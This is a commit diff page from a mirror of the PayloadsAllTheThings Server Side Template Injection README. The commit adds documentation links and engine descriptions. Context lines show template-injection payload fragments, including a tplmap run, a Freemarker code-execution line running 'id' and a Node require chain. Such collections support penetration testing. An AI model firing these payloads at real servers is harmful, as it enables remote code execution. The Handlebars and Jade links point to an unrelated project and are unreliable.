Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update README.md

Browse source
This commit is contained in:
Podalirius 2021-09-26 21:55:23 +02:00 committed by GitHub
parent 58d88e5293
commit 6d48f28d99
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
Server Side Template Injection/README.md
View file

@ -71,9 +71,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
## ASP.NET Razor
### ASP.NET Razor - Basic injection
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c
### ASP.NET Razor - Basic injection
```powershell
@(1+2)
@ -91,6 +92,9 @@ https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/intro
## Expression Language EL
[Official website](https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html)
> Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc. There are many operators in JSP that are used in EL like arithmetic and logical operators to perform an expression. It was introduced in JSP 2.0
### Expression Language EL - Basic injection
```java
@ -142,11 +146,14 @@ ${facesContext.getExternalContext().setResponseHeader("output","".getClass().for
## Freemarker
[Official website](https://freemarker.apache.org/)
> Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
### Freemarker - Basic injection
The template can be `${3*3}` or the legacy `#{3*3}`
The template can be `${3*3}` or the legacy `#{3*3}`.
### Freemarker - Code execution
@ -172,6 +179,9 @@ ${dwf.newInstance(ec,null)("id")}
## Handlebars
[Official website](https://github.com/HubSpot/jinjava)
>
### Handlebars - Command Execution
```handlebars
@ -200,6 +210,9 @@ ${dwf.newInstance(ec,null)("id")}
## Jade / Codepen
[Official website](https://github.com/HubSpot/jinjava)
>
```python
- var x = root.process
- x = x.mainModule.require